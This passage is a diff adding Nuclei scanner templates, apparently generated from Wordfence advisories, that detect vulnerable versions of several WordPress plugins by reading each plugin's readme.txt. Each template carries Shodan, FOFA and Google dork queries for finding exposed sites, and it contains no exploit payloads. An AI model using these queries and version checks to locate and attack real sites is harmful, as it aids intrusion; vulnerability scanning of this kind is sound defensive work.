+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a82fd49e-6e95-4743-900a-fa53b870ec0b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-4271
+ metadata:
+ fofa-query: "wp-content/plugins/svgator/"
+ google-query: inurl:"/wp-content/plugins/svgator/"
+ shodan-query: 'vuln:CVE-2024-4271'
+ tags: cve,wordpress,wp-plugin,svgator,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/svgator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "svgator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-4633-a45a113bbd0240e2736131a0f29a199f.yaml b/poc/cve/CVE-2024-4633-a45a113bbd0240e2736131a0f29a199f.yaml
new file mode 100644
index 0000000000..82673d32f1
--- /dev/null
+++ b/poc/cve/CVE-2024-4633-a45a113bbd0240e2736131a0f29a199f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-4633-a45a113bbd0240e2736131a0f29a199f
+
+info:
+ name: >
+ Slider & Popup Builder by Depicter – Add Image Slider, Carousel Slider, Exit Intent Popup, Popup Modal, Coupon Popup, Post Slider Carousel <= 3.2.1- Authenticated (Author+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Slider and Carousel slider by Depicter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘addExtraMimeType’ function in versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/965cacd3-1786-4e7d-8209-eea293b161d3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-4633
+ metadata:
+ fofa-query: "wp-content/plugins/depicter/"
+ google-query: inurl:"/wp-content/plugins/depicter/"
+ shodan-query: 'vuln:CVE-2024-4633'
+ tags: cve,wordpress,wp-plugin,depicter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/depicter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "depicter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-49232-5f4d040123f64c3c6cdaa6e80c6cdc46.yaml b/poc/cve/CVE-2024-49232-5f4d040123f64c3c6cdaa6e80c6cdc46.yaml
new file mode 100644
index 0000000000..cde6194313
--- /dev/null
+++ b/poc/cve/CVE-2024-49232-5f4d040123f64c3c6cdaa6e80c6cdc46.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-49232-5f4d040123f64c3c6cdaa6e80c6cdc46
+
+info:
+ name: >
+ El mejor Cluster <= 1.1.15 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The El mejor Cluster plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d119ee0-4c16-46b1-ae45-8e0c6de0081b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-49232
+ metadata:
+ fofa-query: "wp-content/plugins/mejorcluster/"
+ google-query: inurl:"/wp-content/plugins/mejorcluster/"
+ shodan-query: 'vuln:CVE-2024-49232'
+ tags: cve,wordpress,wp-plugin,mejorcluster,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mejorcluster/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mejorcluster"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.15')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-49665-0c7cde70a3364f6417c8986330b177f2.yaml b/poc/cve/CVE-2024-49665-0c7cde70a3364f6417c8986330b177f2.yaml
new file mode 100644
index 0000000000..6f51768e85
--- /dev/null
+++ b/poc/cve/CVE-2024-49665-0c7cde70a3364f6417c8986330b177f2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-49665-0c7cde70a3364f6417c8986330b177f2
+
+info:
+ name: >
+ Web Bricks Addons for Elementor <= 1.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Web Bricks Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/429f697c-e101-4fc3-ab9f-557c932bded5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-49665
+ metadata:
+ fofa-query: "wp-content/plugins/webbricks-addons/"
+ google-query: inurl:"/wp-content/plugins/webbricks-addons/"
+ shodan-query: 'vuln:CVE-2024-49665'
+ tags: cve,wordpress,wp-plugin,webbricks-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/webbricks-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "webbricks-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-52436-793469b5c4fe6748676f0c6f113984fc.yaml b/poc/cve/CVE-2024-52436-793469b5c4fe6748676f0c6f113984fc.yaml
new file mode 100644
index 0000000000..4f66f199e3
--- /dev/null
+++ b/poc/cve/CVE-2024-52436-793469b5c4fe6748676f0c6f113984fc.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-52436-793469b5c4fe6748676f0c6f113984fc
+
+info:
+ name: >
+ Post SMTP <= 2.9.9 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Post SMTP plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/faa6ecad-1430-4300-b314-53619d69837b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 4.9
+ cve-id: CVE-2024-52436
+ metadata:
+ fofa-query: "wp-content/plugins/post-smtp/"
+ google-query: inurl:"/wp-content/plugins/post-smtp/"
+ shodan-query: 'vuln:CVE-2024-52436'
+ tags: cve,wordpress,wp-plugin,post-smtp,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/post-smtp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "post-smtp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.9.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53740-3512f8e780249684a6674da83d240a21.yaml b/poc/cve/CVE-2024-53740-3512f8e780249684a6674da83d240a21.yaml
new file mode 100644
index 0000000000..d59c4529da
--- /dev/null
+++ b/poc/cve/CVE-2024-53740-3512f8e780249684a6674da83d240a21.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53740-3512f8e780249684a6674da83d240a21
+
+info:
+ name: >
+ WooCommerce Ultimate Gift Card - Create, Sell and Manage Gift Cards with Customized Email Templates < 2.9.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WooCommerce Ultimate Gift Card - Create, Sell and Manage Gift Cards with Customized Email Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to 2.9.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/859e9233-1e5d-4430-87c1-bcd8225b6258?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53740
+ metadata:
+ fofa-query: "wp-content/plugins/woocommerce-ultimate-gift-card/"
+ google-query: inurl:"/wp-content/plugins/woocommerce-ultimate-gift-card/"
+ shodan-query: 'vuln:CVE-2024-53740'
+ tags: cve,wordpress,wp-plugin,woocommerce-ultimate-gift-card,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woocommerce-ultimate-gift-card/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woocommerce-ultimate-gift-card"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '< 2.9.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53741-3c0e15ff482eacb374486d199d05d15e.yaml b/poc/cve/CVE-2024-53741-3c0e15ff482eacb374486d199d05d15e.yaml
new file mode 100644
index 0000000000..ed33c25e7f
--- /dev/null
+++ b/poc/cve/CVE-2024-53741-3c0e15ff482eacb374486d199d05d15e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53741-3c0e15ff482eacb374486d199d05d15e
+
+info:
+ name: >
+ Simple Popup <= 4.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Simple Popup plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e993667f-8275-4078-afd5-b26ff8528ab4?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53741
+ metadata:
+ fofa-query: "wp-content/plugins/simple-popup-plugin/"
+ google-query: inurl:"/wp-content/plugins/simple-popup-plugin/"
+ shodan-query: 'vuln:CVE-2024-53741'
+ tags: cve,wordpress,wp-plugin,simple-popup-plugin,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-popup-plugin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-popup-plugin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53742-0f8484e9711afc6f54dffab08b8fb64d.yaml b/poc/cve/CVE-2024-53742-0f8484e9711afc6f54dffab08b8fb64d.yaml
new file mode 100644
index 0000000000..33f0bbc0f3
--- /dev/null
+++ b/poc/cve/CVE-2024-53742-0f8484e9711afc6f54dffab08b8fb64d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53742-0f8484e9711afc6f54dffab08b8fb64d
+
+info:
+ name: >
+ Multilevel Referral Affiliate Plugin for WooCommerce <= 2.27 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Multilevel Referral Affiliate Plugin for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c820ff17-718d-4e3a-9a46-7d5a4a573f78?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53742
+ metadata:
+ fofa-query: "wp-content/plugins/multilevel-referral-plugin-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/multilevel-referral-plugin-for-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-53742'
+ tags: cve,wordpress,wp-plugin,multilevel-referral-plugin-for-woocommerce,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/multilevel-referral-plugin-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "multilevel-referral-plugin-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.27')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53743-c41dcd0f5b2eeb66644a41c3df7085c6.yaml b/poc/cve/CVE-2024-53743-c41dcd0f5b2eeb66644a41c3df7085c6.yaml
new file mode 100644
index 0000000000..587c415395
--- /dev/null
+++ b/poc/cve/CVE-2024-53743-c41dcd0f5b2eeb66644a41c3df7085c6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53743-c41dcd0f5b2eeb66644a41c3df7085c6
+
+info:
+ name: >
+ Countdown Timer for Elementor <= 1.3.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Countdown Timer for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e2d35599-2402-4837-97a3-707cd33d439a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53743
+ metadata:
+ fofa-query: "wp-content/plugins/countdown-timer-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/countdown-timer-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-53743'
+ tags: cve,wordpress,wp-plugin,countdown-timer-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/countdown-timer-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "countdown-timer-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53744-19861d99577b3be5146b27b69f05c3f4.yaml b/poc/cve/CVE-2024-53744-19861d99577b3be5146b27b69f05c3f4.yaml
new file mode 100644
index 0000000000..3c5a7a0c72
--- /dev/null
+++ b/poc/cve/CVE-2024-53744-19861d99577b3be5146b27b69f05c3f4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53744-19861d99577b3be5146b27b69f05c3f4
+
+info:
+ name: >
+ Elementor Image Gallery Plugin <= 1.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Elementor Image Gallery Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/52a094b0-acee-412a-ad15-38c9f4510c48?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53744
+ metadata:
+ fofa-query: "wp-content/plugins/skyboot-portfolio-gallery/"
+ google-query: inurl:"/wp-content/plugins/skyboot-portfolio-gallery/"
+ shodan-query: 'vuln:CVE-2024-53744'
+ tags: cve,wordpress,wp-plugin,skyboot-portfolio-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/skyboot-portfolio-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "skyboot-portfolio-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml b/poc/cve/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml
new file mode 100644
index 0000000000..a489ebd6fd
--- /dev/null
+++ b/poc/cve/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb
+
+info:
+ name: >
+ 소셜 공유 버튼 By 코스모스팜 <= 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The 소셜 공유 버튼 By 코스모스팜 plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4540b21-ef63-4cd2-b605-c66a7b76934f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53745
+ metadata:
+ fofa-query: "wp-content/plugins/cosmosfarm-share-buttons/"
+ google-query: inurl:"/wp-content/plugins/cosmosfarm-share-buttons/"
+ shodan-query: 'vuln:CVE-2024-53745'
+ tags: cve,wordpress,wp-plugin,cosmosfarm-share-buttons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cosmosfarm-share-buttons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cosmosfarm-share-buttons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53746-3ded91890966ff471c6e9354d423b5ef.yaml b/poc/cve/CVE-2024-53746-3ded91890966ff471c6e9354d423b5ef.yaml
new file mode 100644
index 0000000000..af31563179
--- /dev/null
+++ b/poc/cve/CVE-2024-53746-3ded91890966ff471c6e9354d423b5ef.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53746-3ded91890966ff471c6e9354d423b5ef
+
+info:
+ name: >
+ Elementor Button Plus <= 1.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Elementor Button Plus plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4f6c69ca-eb1e-445a-af72-5f03dfa07f9b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53746
+ metadata:
+ fofa-query: "wp-content/plugins/fd-elementor-button-plus/"
+ google-query: inurl:"/wp-content/plugins/fd-elementor-button-plus/"
+ shodan-query: 'vuln:CVE-2024-53746'
+ tags: cve,wordpress,wp-plugin,fd-elementor-button-plus,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fd-elementor-button-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fd-elementor-button-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53747-4e94b0bd06bf43aff2239514311d93c8.yaml b/poc/cve/CVE-2024-53747-4e94b0bd06bf43aff2239514311d93c8.yaml
new file mode 100644
index 0000000000..285c4fd7cc
--- /dev/null
+++ b/poc/cve/CVE-2024-53747-4e94b0bd06bf43aff2239514311d93c8.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53747-4e94b0bd06bf43aff2239514311d93c8
+
+info:
+ name: >
+ Video Player for WPBakery <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Video Player for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ee992216-53dd-441e-9c8f-55fbe7567cb7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53747
+ metadata:
+ fofa-query: "wp-content/plugins/video-player-for-wpbakery/"
+ google-query: inurl:"/wp-content/plugins/video-player-for-wpbakery/"
+ shodan-query: 'vuln:CVE-2024-53747'
+ tags: cve,wordpress,wp-plugin,video-player-for-wpbakery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/video-player-for-wpbakery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "video-player-for-wpbakery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53748-7d8e48f7ecab5232b81666c88e70115b.yaml b/poc/cve/CVE-2024-53748-7d8e48f7ecab5232b81666c88e70115b.yaml
new file mode 100644
index 0000000000..fc91258479
--- /dev/null
+++ b/poc/cve/CVE-2024-53748-7d8e48f7ecab5232b81666c88e70115b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53748-7d8e48f7ecab5232b81666c88e70115b
+
+info:
+ name: >
+ WP Mermaid <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WP Mermaid plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44a62dd2-539a-4d9a-a32e-f935aa1d0d58?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53748
+ metadata:
+ fofa-query: "wp-content/plugins/wp-mermaid/"
+ google-query: inurl:"/wp-content/plugins/wp-mermaid/"
+ shodan-query: 'vuln:CVE-2024-53748'
+ tags: cve,wordpress,wp-plugin,wp-mermaid,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-mermaid/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-mermaid"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
